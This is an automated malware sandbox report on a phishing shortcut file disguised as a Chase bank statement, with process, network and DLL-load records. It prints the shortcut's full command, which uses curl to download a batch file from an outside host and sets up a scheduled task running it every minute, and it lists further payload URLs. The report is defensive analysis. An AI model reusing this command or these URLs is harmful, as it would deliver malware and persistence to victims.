Source: wscript.exe, 00000018.00000002.2818480339.00000217B93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2818354957.00000217B91BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817698308.00000217B91AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817679859.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817938071.00000217B91BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B919C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, EGLG6DJOY9K9.js.7.drString found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/agent1.ps1
Source: wscript.exe, 00000018.00000002.2818480339.00000217B93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2818354957.00000217B91BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817698308.00000217B91AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817679859.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817938071.00000217B91BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B919C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, EGLG6DJOY9K9.js.7.drString found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/agent3.ps1
Source: powershell.exe, 00000015.00000002.2794129029.000002AD01608000.00000004.00000800.00020000.00000000.sdmp, Pfx5CcXoK0qm.bat.2.drString found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php
Source: curl.exe, 00000002.00000002.1984030608.00000258B0F87000.00000004.00000020.00020000.00000000.sdmp, chasebank_statement_mar.lnkString found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php
Source: curl.exe, 00000002.00000002.1984030608.00000258B0F87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phpY
Source: curl.exe, 00000002.00000002.1984030608.00000258B0F87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phplW
Source: powershell.exe, 00000007.00000002.2038635027.0000023F43071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2038635027.0000023F43C9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00C2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2053029650.0000023F530ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2053029650.0000023F53223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2038635027.0000023F44A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD101AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownHTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49719 version: TLS 1.2

System Summary

barindex
Found URL in windows shortcut file (LNK)
Source: Initial fileStrings: https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
Windows shortcut file (LNK) contains suspicious command line arguments
Source: chasebank_statement_mar.lnkLNK file: /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'%tmp%\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
